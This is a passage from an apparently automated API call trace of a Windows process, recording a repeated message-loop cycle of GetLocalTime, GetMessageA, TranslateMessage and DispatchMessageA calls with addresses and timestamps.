wMilliseconds=0x46)) [0112.329] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x46)) [0112.329] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.341] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.341] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.341] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x52)) [0112.341] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x52)) [0112.341] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.361] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.361] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.361] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x66)) [0112.361] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x66)) [0112.361] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.394] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.394] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.394] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x87)) [0112.394] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x87)) [0112.394] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.394] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.394] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.394] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x87)) [0112.394] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x87)) [0112.394] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.404] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.404] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.404] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x91)) [0112.405] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x92)) [0112.405] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.425] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.425] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.425] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xa6)) [0112.425] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xa6)) [0112.425] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.436] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.436] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.436] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xb1)) [0112.436] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xb1)) [0112.436] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.459] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.459] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.459] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xc8)) [0112.459] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xc8)) [0112.459] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.469] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.469] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.469] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xd2)) [0112.469] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xd2)) [0112.469] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.480] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.480] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.480] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xdd)) [0112.480] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xdd)) [0112.480] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.502] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.502] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.502] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xf3)) [0112.502] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xf3)) [0112.502] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.512] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.512] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.512] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xfd)) [0112.512] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0xfd)) [0112.512] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.534] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.534] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.534] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x113)) [0112.534] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x113)) [0112.534] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.545] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.545] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.545] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x11e)) [0112.545] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x11e)) [0112.545] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.565] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.565] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.565] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x132)) [0112.565] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x132)) [0112.565] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.576] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.576] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.576] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x13d)) [0112.576] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x13d)) [0112.576] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.590] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.590] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.590] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x14b)) [0112.590] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x14b)) [0112.590] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.611] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.611] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.611] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x160)) [0112.611] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x160)) [0112.611] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.622] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.622] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.622] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x16b)) [0112.622] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x16b)) [0112.622] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.644] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.644] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.644] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x181)) [0112.644] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x181)) [0112.644] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.655] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.655] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.655] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x18c)) [0112.655] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x18c)) [0112.655] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.666] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.666] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.666] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x197)) [0112.666] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x197)) [0112.666] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.687] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.687] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.687] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1ac)) [0112.687] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1ac)) [0112.687] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.698] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.698] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.698] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1b7)) [0112.698] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1b7)) [0112.698] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.742] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.742] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.742] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1e3)) [0112.743] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1e4)) [0112.743] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.753] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.753] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.753] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1ee)) [0112.753] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1ee)) [0112.753] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.763] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.763] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.763] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1f8)) [0112.763] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1f8)) [0112.763] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.785] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.785] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.785] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x20e)) [0112.785] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x20e)) [0112.785] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.796] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.796] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.796] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x219)) [0112.796] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x219)) [0112.796] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.816] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.816] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.816] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x22d)) [0112.816] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x22d)) [0112.816] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.826] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.826] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.826] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x237)) [0112.826] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x237)) [0112.826] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.853] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.853] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.853] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x252)) [0112.853] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x252)) [0112.853] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.883] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.883] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.883] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x270)) [0112.883] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x270)) [0112.883] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.893] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.893] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.893] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x27a)) [0112.893] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x27a)) [0112.893] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x284)) [0112.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x284)) [0112.903] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.928] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.928] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.928] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x29d)) [0112.929] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x29e)) [0112.929] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) 